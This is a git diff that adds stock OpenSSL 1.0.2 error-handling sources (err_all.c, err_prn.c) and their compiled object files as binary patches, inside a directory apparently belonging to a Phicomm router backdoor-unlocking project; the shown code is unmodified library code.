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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err_all.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err_all.c
new file mode 100644
index 0000000..d7575a7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err_all.c
@@ -0,0 +1,168 @@
+/* crypto/err/err_all.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/asn1.h>
+#include <openssl/bn.h>
+#ifndef OPENSSL_NO_EC
+# include <openssl/ec.h>
+#endif
+#include <openssl/buffer.h>
+#include <openssl/bio.h>
+#ifndef OPENSSL_NO_COMP
+# include <openssl/comp.h>
+#endif
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+#ifndef OPENSSL_NO_ECDSA
+# include <openssl/ecdsa.h>
+#endif
+#ifndef OPENSSL_NO_ECDH
+# include <openssl/ecdh.h>
+#endif
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/pem2.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+#include <openssl/conf.h>
+#include <openssl/pkcs12.h>
+#include <openssl/rand.h>
+#include <openssl/dso.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+#include <openssl/ui.h>
+#include <openssl/ocsp.h>
+#include <openssl/err.h>
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+#endif
+#include <openssl/ts.h>
+#ifndef OPENSSL_NO_CMS
+# include <openssl/cms.h>
+#endif
+#ifndef OPENSSL_NO_JPAKE
+# include <openssl/jpake.h>
+#endif
+
+void ERR_load_crypto_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+    ERR_load_ERR_strings();     /* include error strings for SYSerr */
+    ERR_load_BN_strings();
+# ifndef OPENSSL_NO_RSA
+    ERR_load_RSA_strings();
+# endif
+# ifndef OPENSSL_NO_DH
+    ERR_load_DH_strings();
+# endif
+    ERR_load_EVP_strings();
+    ERR_load_BUF_strings();
+    ERR_load_OBJ_strings();
+    ERR_load_PEM_strings();
+# ifndef OPENSSL_NO_DSA
+    ERR_load_DSA_strings();
+# endif
+    ERR_load_X509_strings();
+    ERR_load_ASN1_strings();
+    ERR_load_CONF_strings();
+    ERR_load_CRYPTO_strings();
+# ifndef OPENSSL_NO_COMP
+    ERR_load_COMP_strings();
+# endif
+# ifndef OPENSSL_NO_EC
+    ERR_load_EC_strings();
+# endif
+# ifndef OPENSSL_NO_ECDSA
+    ERR_load_ECDSA_strings();
+# endif
+# ifndef OPENSSL_NO_ECDH
+    ERR_load_ECDH_strings();
+# endif
+    /* skip ERR_load_SSL_strings() because it is not in this library */
+    ERR_load_BIO_strings();
+    ERR_load_PKCS7_strings();
+    ERR_load_X509V3_strings();
+    ERR_load_PKCS12_strings();
+    ERR_load_RAND_strings();
+    ERR_load_DSO_strings();
+    ERR_load_TS_strings();
+# ifndef OPENSSL_NO_ENGINE
+    ERR_load_ENGINE_strings();
+# endif
+    ERR_load_OCSP_strings();
+    ERR_load_UI_strings();
+# ifdef OPENSSL_FIPS
+    ERR_load_FIPS_strings();
+# endif
+# ifndef OPENSSL_NO_CMS
+    ERR_load_CMS_strings();
+# endif
+# ifndef OPENSSL_NO_JPAKE
+    ERR_load_JPAKE_strings();
+# endif
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err_all.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err_all.o
new file mode 100644
index 0000000000000000000000000000000000000000..5851ed96905a2040945fcab63fb905575b2425d8
GIT binary patch
literal 1368
zcmbtS%}T>S5S|#dY7740L8wT@gNnMe{vdjgLaDuohl0?HgtU!SOp}sq!FteF=%e@u
z1z*C)sCe_DGtF+?t`$KCCNuM8zWLeR$Ku)Pm|=hv15V&8k|;oB?90y&+&rWp32(D2
z@6S*w6pk|+7uB}M+nFP_$Fe)Q!}cJ|J?v&#c7HR1VH~-0s1vBA^9#VTJ;F>>lEuh?
zabE`GZq7)j5>s6qi120ckGQ`H?Jy3nAEWZjksHzs%90AvjHgpTbj`sQ!x%*-OnwIk
zc;W|~PGDG)7%nJt#ydMfVA-zAYEUefE!Vf}RxRkXxNn6#xbYfcR3{_K(MCgCv9QzR
zb`=<=NA_BJ+_~ex>NdB5Rl^Wi&2Kgx4>8Z@4#Vr(3AtUn6>-CBvsU1@oPc+L1&(Vo
z=i0go?4~1{|HGt_OLwTBWM0&a&qKuen_WemF!`=T8Wg3YS)IR*|EEy@%HKvV)y$%*
zBKvQtAo{Yuv<C{Nrnb~T@g+|})Q4W%(A{G!`5E+8p<PwE#DHq*{H{pS_tN<l%%fMG
z7x~h>h(VVGFpZYxlzfSg>P?g$eNg(5ff=+^L+2Bw-yKn&ME^Ak6cKQY%%eAo-xrCE
JI5To|{wFLfQGNgb

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err_prn.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err_prn.c
new file mode 100644
index 0000000..6e352ef
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err_prn.c
@@ -0,0 +1,113 @@
+/* crypto/err/err_prn.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/lhash.h>
+#include <openssl/crypto.h>
+#include <openssl/buffer.h>
+#include <openssl/err.h>
+
+void ERR_print_errors_cb(int (*cb) (const char *str, size_t len, void *u),
+                         void *u)
+{
+    unsigned long l;
+    char buf[256];
+    char buf2[4096];
+    const char *file, *data;
+    int line, flags;
+    unsigned long es;
+    CRYPTO_THREADID cur;
+
+    CRYPTO_THREADID_current(&cur);
+    es = CRYPTO_THREADID_hash(&cur);
+    while ((l = ERR_get_error_line_data(&file, &line, &data, &flags)) != 0) {
+        ERR_error_string_n(l, buf, sizeof buf);
+        BIO_snprintf(buf2, sizeof(buf2), "%lu:%s:%s:%d:%s\n", es, buf,
+                     file, line, (flags & ERR_TXT_STRING) ? data : "");
+        if (cb(buf2, strlen(buf2), u) <= 0)
+            break;              /* abort outputting the error report */
+    }
+}
+
+#ifndef OPENSSL_NO_FP_API
+static int print_fp(const char *str, size_t len, void *fp)
+{
+    BIO bio;
+
+    BIO_set(&bio, BIO_s_file());
+    BIO_set_fp(&bio, fp, BIO_NOCLOSE);
+
+    return BIO_printf(&bio, "%s", str);
+}
+
+void ERR_print_errors_fp(FILE *fp)
+{
+    ERR_print_errors_cb(print_fp, fp);
+}
+#endif
+
+static int print_bio(const char *str, size_t len, void *bp)
+{
+    return BIO_write((BIO *)bp, str, len);
+}
+
+void ERR_print_errors(BIO *bp)
+{
+    ERR_print_errors_cb(print_bio, bp);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err_prn.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/err/err_prn.o
new file mode 100644
index 0000000000000000000000000000000000000000..ed66e1a44dc1dd0a10a61322485d8cf1ef14881b
GIT binary patch
literal 3376
zcmbuB|7%-S6u@ticB|UG)>^UJF~XW^hW3$k6YD_9OVjoR9&5>xxz5c;n!Gl3Y0|yC
zV(0wQQ8##W&o95}Z~g%y75qU&w!lWk-)3=$Afo=X!k})79kMl^bKkx8_B8>~LtpN>
